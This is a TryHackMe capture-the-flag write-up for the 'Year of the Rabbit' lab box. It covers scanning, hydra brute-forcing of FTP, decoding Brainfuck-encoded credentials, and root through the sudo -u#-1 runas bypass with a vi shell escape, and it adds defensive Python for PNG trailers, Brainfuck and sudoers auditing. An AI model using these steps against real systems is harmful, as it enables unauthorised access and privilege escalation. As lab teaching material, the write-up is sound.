THM Writeup – Year of the Rabbit
Time to enter the warren…
Let’s have a nice gentle start to the New Year!
Can you hack into the Year of the Rabbit box without falling down a hole?
(Please ensure your volume is turned up!)
Add the IP address to your hosts file:
echo '10.10.64.100 rabbit.thm' >> /etc/hosts
Scan the target machine – basic scan – find open ports first:
nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv rabbit.thm
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
Get more details about open ports:
nmap -T4 -A -p 21,22,80 rabbit.thm
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (EdDSA)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Enumeration
Directory bruteforce the web application:
root@ip-10-10-113-0:~# gobuster dir -u http://rabbit.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
/index.html (Status: 200)
/assets (Status: 301)
/server-status (Status: 403)
===============================================================
Check the assets directory – browse to http://rabbit.thm/assets/
There are Rick Astley’s song Never Gonna Give You Up and a CSS file.
Check the CSS file:
We found a secret php page:
/sup3r_s3cr3t_fl4g.php
Let’s browse to it http://rabbit.thm/sup3r_s3cr3t_fl4g.php
When we click OK, we are redirected to youtube.com Rick Astley’s song again…
Fire up BurpSuite, intercept the traffic and intercept the response to the first request:
We found another hidden directory:
/WExYY2Cv-qU
To intercept a response to a request, right click request body, select Do intercept -> Response to this request:
Now browse to the directory we found http://rabbit.thm/WExYY2Cv-qU
Download the picture and examine it:
root@ip-10-10-113-0:~# exiftool Hot_Babe.png
ExifTool Version Number : 10.80
File Name : Hot_Babe.png
Directory : .
File Size : 464 kB
File Modification Date/Time : 2022:02:15 15:36:39+00:00
File Access Date/Time : 2022:02:15 15:36:52+00:00
File Inode Change Date/Time : 2022:02:15 15:36:39+00:00
File Permissions : rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 512
Image Height : 512
Bit Depth : 8
Color Type : RGB
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
SRGB Rendering : Perceptual
Warning : [minor] Trailer data after PNG IEND chunk
Image Size : 512x512
Megapixels : 0.262
Hm, nothing of interest, let’s try strings now:
Now this is awesome, we’ve got an FTP username and a list of possible passwords.
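The exiftool warning above ("Trailer data after PNG IEND chunk") was the real hint: a well-formed PNG ends at its IEND chunk, so anything after it is foreign data that image viewers silently ignore. The following is an added example, not code from the original writeup. It walks the chunk structure (checking each CRC), returns whatever follows IEND, and runs a small strings-like extraction over it. The sample PNG and the trailer text are constructed inline so the script runs offline; the real Hot_Babe.png is not included.

```python
import string
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_chunks(data):
    """Yield (chunk_type, chunk_body, offset_after_chunk) for every chunk up to IEND.

    Each chunk is: 4-byte big-endian length, 4-byte type, body, 4-byte CRC over type+body.
    """
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        pos += 12 + length
        yield ctype, body, pos
        if ctype == b"IEND":
            return
    raise ValueError("no IEND chunk found")


def trailer_after_iend(data):
    """Return the bytes that follow the IEND chunk (empty if the file ends cleanly)."""
    end = None
    for ctype, _body, after in png_chunks(data):
        if ctype == b"IEND":
            end = after
    return data[end:]


def printable_strings(blob, min_len=4):
    """Rough equivalent of `strings`: runs of printable ASCII at least min_len long."""
    out, run = [], []
    for b in blob:
        ch = chr(b)
        if ch in string.printable and ch not in "\t\n\r\x0b\x0c":
            run.append(ch)
        else:
            if len(run) >= min_len:
                out.append("".join(run))
            run = []
    if len(run) >= min_len:
        out.append("".join(run))
    return out


def make_chunk(ctype, body):
    """Build one PNG chunk with a correct CRC."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_sample_png(trailer):
    """Constructed 1x1 RGB PNG followed by arbitrary trailer bytes (sample data, not the CTF image)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, colour type 2 (RGB)
    raw = b"\x00" + b"\xff\x00\x00"  # filter byte 0 + one red pixel
    return (PNG_SIGNATURE
            + make_chunk(b"IHDR", ihdr)
            + make_chunk(b"IDAT", zlib.compress(raw))
            + make_chunk(b"IEND", b"")
            + trailer)


# Constructed trailer: a couple of non-printable bytes, then a text note.
SAMPLE_TRAILER = b"\x00\x01constructed hidden note: user=sample-user\n"

if __name__ == "__main__":
    png = build_sample_png(SAMPLE_TRAILER)
    extra = trailer_after_iend(png)
    print(f"{len(extra)} trailer bytes after IEND")
    for s in printable_strings(extra):
        print(s)
```

Run it against a real file with `trailer_after_iend(open("Hot_Babe.png", "rb").read())`; a non-empty result is the same condition exiftool flagged, and is worth a look in any image a pipeline accepts from outside.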
Put all those passwords into a .txt file and use hydra to brute-force it:
root@ip-10-10-113-0:~# hydra -l ftpuser -P pwds.txt ftp://rabbit.thm -t 4 -f
[21][ftp] host: rabbit.thm login: ftpuser password: [REDACTED]
Login to FTP:
root@ip-10-10-113-0:~# ftp rabbit.thm
Connected to rabbit.thm.
220 (vsFTPd 3.0.2)
Name (rabbit.thm:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Look around:
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jan 23 2020 .
drwxr-xr-x 2 0 0 4096 Jan 23 2020 ..
-rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt
226 Directory send OK.
ftp> get Eli's_Creds.txt -
remote: Eli's_Creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes).
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< [REDACTED] ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <
226 Transfer complete.
758 bytes received in 0.00 secs (889.7048 kB/s)
I knew I had already seen strings like these, but couldn’t remember what it was called – I knew an ugly word was part of the name, so I used Google:
Then I did another search:
And came across this site https://www.dcode.fr/brainfuck-language
Now we probably have SSH username and password.
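Eli's_Creds.txt is a Brainfuck program, written in groups of five characters with spaces in between; the spaces are simply ignored by the language, which is why an online decoder handles it. As an added example (not code from the original writeup, and the real program is not reproduced here because the page redacts it), this is a small interpreter plus a heuristic for recognising the encoding, run on a constructed "Hello World!" program. Any file like the one pulled from FTP can be fed to run_brainfuck() directly.

```python
BF_OPS = "<>+-.,[]"


def looks_like_brainfuck(text, threshold=0.95):
    """Heuristic: after dropping whitespace, nearly every character is one of the eight Brainfuck ops."""
    body = "".join(text.split())
    if not body:
        return False
    return sum(c in BF_OPS for c in body) / len(body) >= threshold


def run_brainfuck(program, input_bytes=b"", tape_size=30000):
    """Interpret a Brainfuck program and return its output as text (one byte per '.')."""
    code = [c for c in program if c in BF_OPS]  # spaces, newlines and other noise are ignored
    # Pre-compute matching bracket positions so loops are O(1) jumps.
    jump, stack = {}, []
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unmatched ]")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unmatched [")

    tape = [0] * tape_size
    ptr = pc = 0
    inp = list(input_bytes)
    out = bytearray()
    while pc < len(code):
        c = code[pc]
        if c == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("tape overrun")
        elif c == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("tape underrun")
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) % 256  # cells are 8-bit and wrap
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ".":
            out.append(tape[ptr])
        elif c == ",":
            tape[ptr] = inp.pop(0) if inp else 0
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return out.decode("latin-1")


# Constructed sample: the well-known "Hello World!" program, spaced in 5-character groups
# like the file on the FTP server was.
HELLO = ("+++++ +++[> ++++[ >++>+ ++>++ +>+<< <<-]> +>+>- >>+[< ]<-]> >.>-- -.+++ ++++. "
         ".+++. >>.<- .<.++ +.--- ---.- ----- --.>> +.>++ .")

if __name__ == "__main__":
    print("looks like Brainfuck:", looks_like_brainfuck(HELLO))
    print(run_brainfuck(HELLO), end="")
```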
User flag
Try to login via SSH:
root@ip-10-10-113-0:~# ssh [REDACTED]@rabbit.thm
The authenticity of host 'rabbit.thm (10.10.64.100)' can't be established.
ECDSA key fingerprint is SHA256:ISBm3muLdVA/w4A1cm7QOQQOCSMRlPdDp/x8CNpbJc8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'rabbit.thm,10.10.64.100' (ECDSA) to the list of known hosts.
[REDACTED]@rabbit.thm's password:
1 new message
Message from Root to Gwendoline:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
END MESSAGE
[REDACTED]@year-of-the-rabbit:~$
Great, we are connected via SSH to the target machine.
Find the user flag:
eli@year-of-the-rabbit:~$ ls -lA
total 648
lrwxrwxrwx 1 eli eli 9 Jan 23 2020 .bash_history -> /dev/null
-rw-r--r-- 1 eli eli 220 Jan 23 2020 .bash_logout
-rw-r--r-- 1 eli eli 3515 Jan 23 2020 .bashrc
drwxr-xr-x 8 eli eli 4096 Jan 23 2020 .cache
drwx------ 11 eli eli 4096 Jan 23 2020 .config
-rw------- 1 eli eli 589824 Jan 23 2020 core
drwxr-xr-x 2 eli eli 4096 Jan 23 2020 Desktop
drwxr-xr-x 2 eli eli 4096 Jan 23 2020 Documents
drwxr-xr-x 2 eli eli 4096 Jan 23 2020 Downloads
drwx------ 3 eli eli 4096 Jan 23 2020 .gconf
drwx------ 2 eli eli 4096 Jan 23 2020 .gnupg
-rw------- 1 eli eli 1098 Jan 23 2020 .ICEauthority
drwx------ 3 eli eli 4096 Jan 23 2020 .local
drwxr-xr-x 2 eli eli 4096 Jan 23 2020 Music
drwxr-xr-x 2 eli eli 4096 Jan 23 2020 Pictures
-rw-r--r-- 1 eli eli 675 Jan 23 2020 .profile
drwxr-xr-x 2 eli eli 4096 Jan 23 2020 Public
drwx------ 2 eli eli 4096 Jan 23 2020 .ssh
drwxr-xr-x 2 eli eli 4096 Jan 23 2020 Templates
drwxr-xr-x 2 eli eli 4096 Jan 23 2020 Videos
eli@year-of-the-rabbit:~$ ls -lA /home/
total 8
drwxr-xr-x 16 eli eli 4096 Jan 23 2020 eli
drwxr-xr-x 2 gwendoline gwendoline 4096 Jan 23 2020 gwendoline
eli@year-of-the-rabbit:~$ ls -la /home/gwendoline/
total 24
drwxr-xr-x 2 gwendoline gwendoline 4096 Jan 23 2020 .
drwxr-xr-x 4 root root 4096 Jan 23 2020 ..
lrwxrwxrwx 1 root root 9 Jan 23 2020 .bash_history -> /dev/null
-rw-r--r-- 1 gwendoline gwendoline 220 Jan 23 2020 .bash_logout
-rw-r--r-- 1 gwendoline gwendoline 3515 Jan 23 2020 .bashrc
-rw-r--r-- 1 gwendoline gwendoline 675 Jan 23 2020 .profile
-r--r----- 1 gwendoline gwendoline 46 Jan 23 2020 user.txt
Ok, the user flag is in gwendoline’s home directory and only she has permissions to read it.
So we need to move laterally. Remember the message for Gwendoline from when we first logged in:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
Let’s try to find that secret place:
eli@year-of-the-rabbit:/$ find / -type d -name 's3cr3t' 2>/dev/null
/usr/games/s3cr3t
eli@year-of-the-rabbit:/$ cd /usr/games/s3cr3t
eli@year-of-the-rabbit:/usr/games/s3cr3t$ ls -lA
total 4
-rw-r--r-- 1 root root 138 Jan 23 2020 .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
eli@year-of-the-rabbit:/usr/games/s3cr3t$ cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\!
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just [REDACTED]
Honestly!
Yours sincerely
-Root
We have Gwendoline’s password, so switch to the gwendoline user:
eli@year-of-the-rabbit:~$ su gwendoline
Password:
gwendoline@year-of-the-rabbit:/home/eli$
Now read the user flag:
gwendoline@year-of-the-rabbit:/home/eli$ cat /home/gwendoline/user.txt
THM{[REDACTED]}
Root flag
There are a few things I try to escalate my privileges before going for scripts like linpeas.sh:
sudo -l
cat /etc/crontab
getcap -r / 2>/dev/null
find / -type f -perm -4000 2>/dev/null
So let’s check the first one:
gwendoline@year-of-the-rabbit:/tmp$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
So our user gwendoline is allowed to run vi as any user but root. At this point I got stuck for a while, then I came across this site https://www.zdnet.com/article/10-years-old-sudo-bug-lets-linux-users-gain-root-level-access/ – reading the article I found a vulnerability that is called minus 1 uid:
I clicked the link and read another article, where I came to this section:
So I went and tried that and it worked:
gwendoline@year-of-the-rabbit:/tmp$ sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
Now a vi editor is opened – go to the command line by typing :, then type !/bin/bash and press ENTER, and you become the root user.
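Two things went wrong in that sudoers rule, and both are visible in the sudo -l output itself: the runas list is a negation ("ALL except root"), which only holds as long as sudo resolves every uid correctly, and the permitted binary is an editor with a shell escape, so restricting it to one file restricts nothing. As an added example from the defender's side (not code from the original writeup), here is a small audit that parses rules in sudo -l / sudoers form and flags exactly those two patterns plus NOPASSWD. The list of shell-escape binaries and the sample output are assumptions constructed for the example; the only rule taken from this box is the vi one.

```python
import re

# Assumption: a short illustrative list of binaries that can start a shell from inside
# (vi's :!/bin/bash is the case on this box). Extend it for your own estate.
SHELL_ESCAPE_BINARIES = {"vi", "vim", "less", "more", "man", "nano"}

# Matches "(runas) [TAG: ...] command args" as printed by sudo -l or written in sudoers.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_rule(line):
    """Return a dict for a command rule line, or None for anything else (headers, Defaults, blanks)."""
    m = RULE_RE.match(line)
    if not m:
        return None
    user_part = m.group("runas").split(":")[0]  # "(users : groups)"; groups are not audited here
    runas_users = [u.strip() for u in user_part.split(",") if u.strip()]
    tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
    argv = m.group("cmd").split()
    return {"runas": runas_users, "tags": tags, "binary": argv[0], "args": argv[1:]}


def audit_rule(rule):
    """Return a list of findings (empty when the rule shows none of the audited weaknesses)."""
    findings = []
    if any(u.startswith("!") for u in rule["runas"]):
        findings.append("runas list is a '!' exclusion; list the permitted target users explicitly "
                        "(and keep sudo patched, since exclusions depend on correct uid resolution)")
    if rule["binary"].rsplit("/", 1)[-1] in SHELL_ESCAPE_BINARIES:
        findings.append(f"{rule['binary']} can spawn a shell from inside, so limiting it to one file "
                        "is not a boundary; use sudoedit or a dedicated script")
    if "NOPASSWD" in rule["tags"] and findings:
        findings.append("NOPASSWD removes the only prompt that might slow down abuse of this rule")
    return findings


def audit_sudo_l_output(text):
    """Map each command rule line in sudo -l output to its findings."""
    results = {}
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule:
            results[line.strip()] = audit_rule(rule)
    return results


# Constructed sample: the rule from this box plus one ordinary rule for contrast.
SAMPLE_SUDO_L = """Matching Defaults entries for gwendoline on year-of-the-rabbit:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for rule_line, findings in audit_sudo_l_output(SAMPLE_SUDO_L).items():
        print(rule_line)
        for f in findings or ["no findings"]:
            print("   -", f)
```

Pipe real output through it with `audit_sudo_l_output(subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout)`; the same parser works on `visudo -c`-clean sudoers lines because the rule syntax after the user specification is the same.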
Now just read the root flag:
root@year-of-the-rabbit:/home/gwendoline# cat /root/root.txt
THM{[REDACTED]}
Do you like this writeup? Check out other THM Writeups.